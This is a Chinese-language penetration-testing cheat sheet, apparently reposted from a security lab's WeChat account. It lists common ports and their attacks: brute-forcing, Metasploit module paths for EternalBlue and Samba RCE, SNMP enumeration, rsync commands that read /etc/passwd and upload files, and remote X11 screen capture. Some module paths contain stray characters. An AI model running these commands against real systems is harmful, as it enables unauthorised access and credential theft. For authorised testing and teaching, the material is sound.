常见端口漏洞

端口21/服务ftp

口令爆破/匿名访问

ftp使用弱口令的话，可以使用爆破的方式,ftp的爆破工具有很多，可以使用hydra，msf中的ftp爆破模块等等。

后门vsftpd

vsftp是Very Secure FTP Daemon的简写（Linux下），它的v2.3.4版本的可下载源代码中被加入了后门代码，他会用笑脸符号:)回应用户登陆ftp。

端口22/服务SSH

口令爆破

ssh使用弱口令的话，可以使用爆破的方式,超级弱口令工具，hydra，msf中的ssh爆破模块等等。

openssh用户名枚举

低于指定版本（<7.8）的openssh协议存在用户名枚举漏洞，该漏洞可使攻击者枚举字典内存在的服务器ssh用户名。

端口23/服务telnet

口令爆破

telnet使用弱口令的话，可以使用爆破的方式,超级弱口令工具，hydra，msf中的telnet爆破模块等等。

端口25/服务smtp

用户名枚举

auxiliary/scanner/1 smtp/smtp_enum

smtp-user-enum -M VRFY -u root -t IP

未授权访问

smtp协议设计之初并没有添加身份验证的机制，导致任意用户可以连接到SMTP服务器进行邮件发送的

操作：

使用telnet或者nc连接smtp服务的25端口，连接成功返回220

使用EHLO xxxx 或者 HELO xxxx ，连接成功返回250

使用MAIL FROM:< xx@xx > 指定发件人，设置成功返回250

使用RCPT TO:< XX@XX > 指定收件人，设置成功返回250

使用DATA写入邮件内容，以单行的“.”结束，编写成功返回250，并且返回队列id

使用QUIT退出连接

端口139、445/服务Samba

口令爆破

Samba使用弱口令的话，可以使用爆破的方式,超级弱口令工具。

远程代码执行CVE-2017-7494

该漏洞要求的利用条件：拥有共享文件写入权限，如：匿名可写等;需要知道共享目录的物理路径。

exploit/linux/samba/1 is_known_pipename

未授权访问

在samba服务未设置用户名及密码的情况下，可以直接在文件资源管理器访问samba地址。

smbclient -L //ip

ms17-010永恒之蓝

auxiliary/scanner/smb/smb_ms17_010

exploit/windows/smb/ms17_010_eternalblue

端口161/服务snmp

口令爆破

nmap ip –sU –p 161 –script=snmp-brute

默认团体名/刺探扫描

通过snmputil.exe获取信息：

snmputil walk ip public .1.3.6.1.2.1.25.4.2.1.2//列出系统进程

snmputil walk ip public.1.3.6.1.2.1.25.6.3.1.2 //列出安装的软件

snmputil walk ip public .1.3.6.1.2.1.1 //列出系统信息

snmputil get ip public .1.3.6.1.4.1.77.1.4.1.0 //列出域名

snmputil walk ip public.1.3.6.1.4.1.77.1.2.25.1.1 //列系统用户列表

通过nmap审计脚本：

弱口令利用：nmap -sU -p161 --script=snmp-netstat 目标ip//获取网络端口状态

nmap –sU –p161 –script=snmp-sysdescr 目标ip //获取系统信息

nmap -sU -p161 --script=snmp-win32-user 目标ip //获取用户信息

端口443/服务ssl

openssl心脏出血漏洞

auxiliary/scanner/ssl/1 openssl_heartbleed

端口513/服务rlogin

未授权访问

rlogin -l root ip

端口873/服务rsync

未授权访问

查看可用模块名列表

rsync ip::

rsync rsync://ip:873/

rsync rsync://ip

查看src模块

rsync ip::src

rsync rsync://ip/src

下载任意文件

rsync rsync://ip/src/etc/passwd ./

rsync ip::src/etc/passwd ./

上传任意文件

rsync x.txt rsync://ip/src/home/

rsync x.txt ip::src/home/

端口1099/服务Java-rmi

java-rmi反序列化漏洞

exploit/multi/1 misc/java_rmi_server

端口1433/服务mssql

口令爆破

mssql使用弱口令的话，可以使用爆破的方式,超级弱口令工具。

端口1521/服务oracle

口令爆破

oracle使用弱口令的话，可以使用爆破的方式,超级弱口令工具。

中间人投毒 CVE-2012-1675

auxiliary/scanner/oracle/tnspoison_checker

端口2049/服务nfs

nfs 共享文件夹挂载

auxiliary/scanner/nfs/nfsmount

showmount -e ip

端口2181/服务zookeeper

未授权访问

使用工具zktools.exe进行连接目标地址，无需用户名密码。

端口3306/服务mysql

口令爆破

mysql使用弱口令的话，可以使用爆破的方式,超级弱口令工具。

端口3389/服务rdp

RDP远程代码执行攻击事件CVE-2019-0708

auxiliary/scanner/rdp/cve_2019_0708_bluekeep

ms12-020死亡蓝屏漏洞攻击

auxiliary/scanner/rdp/ms12_020_check

端口5432/服务postgresql

口令爆破

postgresql使用弱口令的话，可以使用爆破的方式,超级弱口令工具。

端口5900/服务vnc

口令爆破

vnc使用弱口令的话，可以使用爆破的方式,超级弱口令工具。

未授权访问

auxiliary/scanner/vnc/vnx_none_auth

端口6000/服务X11

未授权访问

auxiliary/scanner/x11/open_x11

远程截屏

截屏命令：

xwd -root -screen -silent -display ip:0 > 1.xwd

转换格式命令：

convert 1.xwd 1.png

端口6379/服务redis

口令爆破

redis使用弱口令的话，可以使用爆破的方式,超级弱口令工具。

未授权访问

redis-cli -h ip -p 6379

>ping

>info

端口7001/服务weblogic

反序列化漏洞（CVE-2019-2725）

访问路径/_async/AsyncResponseServiceSoap12判断wls9_async_response组件是否存在；

访问路径/wls-wsat/CoordinatorPortType，判断wls-wsat组件是否存在；

端口8080/服务tomcat

未授权访问

auxiliary/scanner/http/tomcat_mgr_login

原文始发于微信公众号（CTS纵横安全实验室）：常见端口漏洞